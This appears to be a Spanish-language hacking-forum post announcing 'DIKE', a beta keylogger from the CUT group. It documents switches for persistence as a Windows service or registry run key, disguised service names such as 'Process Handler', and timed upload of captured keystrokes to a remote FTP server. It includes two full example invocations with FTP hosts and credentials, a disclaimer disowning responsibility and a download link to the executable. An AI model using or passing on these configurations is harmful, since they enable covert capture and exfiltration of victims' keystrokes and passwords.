DIKE es un acrónimo de DarkIker Is a Kiddie Empirical o DarkIker Keylogger( copyright flacman ), en si DIKE es un keylogger echo a medida bajo las especificaciones de varios miembros CUT. DIKE esta diseñado para ser configurado por linea de comandos proveiendo una rápida configuración en base a los parámetros especificados; el fichero de log generado es Unicode al igual que su logueo. La lista de parámetros se muestra a continuación:
n = Nombre del servicio o clave del registro ( string ).
s = Añadir como servicio para iniciarse con el pc.
t = Mover el ejecutable a la carpeta temporal y borrar en el reinicio( no combinable con 's' y 'S' ).
S = Añadir al registro para iniciarse con el pc( no combinable con 's' ).
l(ele) = Directorio en donde crear el archivo de logs( string ).
f = Activa la opción de subir los logs a un servidor FTP y especifica el servidor FTP( string ).
u = Nombre de Usuario del servidor FTP( string ).
p = Password del servidor FTP( string ).
T = Intervalo de tiempo( en segundos ) para subir los logs al servidor FTP( string ).
Las opciones marcadas con "( string )" al final indican que inmediatamente después de la opción se debe dejar un espacio y especificar el string que acompaña la opción, si el string contiene espacios debe especificarse entre comillas, el siguiente es un ejemplo de DIKE configurado para añadirse como un servicio, usando como nombre CUT, subiendo los logs al servidor FTP ftp.colombiaunderground.org con username Flacman y password "DIKE Mola":
X:\DIKE>DIKE sn CUT f ftp.colombiaunderground.org u Flacman p "DIKE Mola"
El siguiente ejemplo muestra configurando DIKE para que se añada como servicio, con nombre de servicio "Process Handler", seteando como directorio de logs "C:\Program Files\Ares", servidor ftp ftp.usuarios.lycos.es, username CUT, password 123456 e intervalo de subida 180 segundos.
X:\DIKE>DIKE sn "Process Handler" l "E:\Program Files\Ares" f ftp.usuarios.lycos.es p 123456 u CUT T 180
Llegado el caso que no se especifique ninguna opción, en la configuración o algunas sean "obviadas" las siguientes son las por defecto:
Nombre del Servicio/Clave del registro = ProcessSC.
Directorio de Logs = NULL( como programa en el mismo directorio, si es servicio en el directorio de sistema).
Servidor FTP = NULL( No activado por defecto ).
Intervalo de Subida de Logs = 120 Segs.
Nombre fichero de logs = Nombre PC + DÃa + Mes.
Esta es una versión Beta, sujeta a que ustedes la testeen en busca de errores y fallos, y por supuesto a comentarios y sugerencias, esta versión pesa 52 Kb debido a que es una beta, espero en la versión final no superar los 15 Kb. Bueno chau.
PD: Como casi me olvido el disclaimer si esta es una parte sumamente importante que es donde yo me lavo
las manos, asà que aquà voy:
"Yo la persona representada bajo la figura hipotética de DarkIker y/o Iker, no
me hago responsable por cualquier acción por parte de los usuarios de, este
programa asà como tampoco certifico que este funcione como e descrito a lo
largo de este post. Cualquier acción legal o jurÃdica recaerá única y exclusivamente
en el usuario del programa mas no en su creador representado en mi persona".
Download Link:
http://www.colombiaunderground.org/Aportes_CUT/DIKE.exeAtt:
DarkIker